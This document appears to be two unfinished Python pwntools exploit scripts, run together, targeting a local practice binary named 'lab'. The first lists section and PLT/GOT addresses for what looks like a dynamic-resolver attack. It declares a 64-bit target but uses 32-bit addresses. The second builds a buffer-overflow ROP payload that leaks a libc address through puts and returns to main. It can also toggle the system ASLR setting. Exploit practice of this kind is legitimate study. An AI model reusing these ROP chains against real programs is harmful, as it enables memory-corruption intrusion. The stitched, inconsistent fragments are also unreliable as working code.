#!/usr/bin/env python3 from pwn import process, ELF, log, context, pause from fastpwn import pack context(arch='amd64', os='linux', log_level='DEBUG') binary = ELF('./lab') p = binary.process() offset = 112 #### define sections of the binary # since PIE is not enabled, these will be static offsets to whichever section we want # we will not pack them, since after they are in bytes we cannot use as decimal offsets :( bss = 0x0804c028 plt = 0x08049030 rel_plt = 0x08048424 dynsym = 0x08048260 dynstr = 0x08048320 #### Important entries within PLT/GOT got_read = 0x0804c010 plt_read = 0x08049050 log.info("") log.warning("continue?") log.info("") pause() log.info(".bss: \t%s" % hex(bss)) log.info(".plt: \t%s" % hex(plt)) log.info(".rel.plt: %s" % hex(rel_plt)) log.info(".dynsym: %s" % hex(dynsym)) log.info(".dynstr: %s" % hex(dynstr)) log.info("GOT entry to read: %s" % hex(got_read)) log.info("PLT entry to read: %s" % hex(plt_read)) stack = 0x300
#!/usr/bin/env python3 from pwn import ELF, process, context, log from fastpwn import pack, aslr # custom library :) from sys import argv, exit try: if len(argv) > 1 and argv[1] == "-l": if aslr.read(): aslr.write("2") context(arch='amd64', os='linux', log_level='DEBUG') # binary context binary = ELF("./lab") # define our binary p = binary.process(env={'LD_PRELOAD': './libc.so.6' }) # start our process and define enviroment libc = binary.libc # name our libc object # we can statically find the addresses of the PLT and GOT within the binary # just in case you were too lazy to, here is the pwntools way to do it # # plt_puts=binary.plt['puts'] # got_puts=binary.got['puts'] # main_addr=binary.sym['main'] pop_rdi = pack.pk64(0x00000000004011e3) got_puts = pack.pk64(0x00404018) plt_puts = pack.pk64(0x00401030) main_addr = pack.pk64(0x00401136) offset = 40 leak_payload = b"A" * offset # overwrite ret addr, main ret back to gadget leak_payload += pop_rdi # next we use a gadget, rdi will be the first parameter leak_payload += got_puts # pass the address of the puts() entry on the global offset table leak_payload += plt_puts # then, call puts(), this will actuall call puts leak_payload += main_addr # ret back to main, since we still want to overwrite the buffer again